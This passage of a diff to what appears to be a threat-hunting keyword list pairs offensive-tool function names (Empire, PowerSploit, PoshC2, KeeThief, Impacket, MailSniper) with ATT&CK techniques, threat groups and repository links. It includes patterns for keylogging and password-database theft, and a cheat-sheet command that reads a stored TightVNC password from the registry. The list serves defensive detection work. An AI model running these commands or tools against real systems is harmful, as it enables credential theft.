TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Get-GPPPassword.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1124","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-GPPPassword.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*Get-HeadersWithPrtCookies*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" "*GetHijackableDllName*","offensive_tool_keyword","cobaltstrike","A faithful transposition of the key features/functionality of @itm4n's PPLDump project as a BOF.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/PPLDump_BOF","1","1","N/A","10","10","131","24","2021-09-24T07:10:04Z","2021-09-24T07:05:59Z" -"*Get-ImageNtHeaders*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1103","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*get-implantworkingdirectory*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Get-ImageNtHeaders*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1103","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*get-implantworkingdirectory*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" "*Get-InactiveDomainAdmins*","offensive_tool_keyword","HoneypotBuster","Microsoft PowerShell module designed for red teams that can be used to find honeypots and honeytokens in the network or at the host","T1083 - T1059.001 - T1112","TA0007 - TA0002","N/A","N/A","Lateral Movement","https://github.com/JavelinNetworks/HoneypotBuster","1","0","N/A","8","3","270","60","2017-12-05T13:03:11Z","2017-07-22T15:40:44Z" -"*Get-InternetExplorerBookmarks*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Get-InternetExplorerHistory*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-InternetExplorerBookmarks*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-InternetExplorerHistory*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-ItemProperty -Path HKLM:\Software\TightVNC\Server -Name *Password* | select -ExpandProperty Password*","offensive_tool_keyword","AD exploitation cheat sheet","TightVNC password (convert to Hex then decrypt with e.g.: https://github.com/frizb/PasswordDecrypts)","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Get-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name *RunAsPPL*","offensive_tool_keyword","AD exploitation cheat sheet","Sometimes LSASS is configured to run as a protected process (PPL). You can query this with PowerShell as follows.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","POST Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Get-KeePassConfigTrigger*","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1213 - T1215 - T1566","TA0005 - TA0007 - TA0008","N/A","N/A","Credential Access","https://github.com/GhostPack/KeeThief","1","1","N/A","N/A","9","863","151","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z" -"*Get-KeePassDatabaseKey*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-KeePassDatabaseKey*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-KeePassDatabaseKey*","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1213 - T1215 - T1566","TA0005 - TA0007 - TA0008","N/A","N/A","Credential Access","https://github.com/GhostPack/KeeThief","1","1","N/A","N/A","9","863","151","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z" -"*Get-KeePassINIFields*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Get-KeePassXMLFields*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Get-KeystrokeData*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*Get-Keystrokes *","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" -"*Get-Keystrokes*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1067","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*get-keystrokes*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*Get-Keystrokes*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" -"*Get-Killdate*","offensive_tool_keyword","empire","empire function name of agent.ps1.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1050","TA0004 - TA0006 - TA0007 - 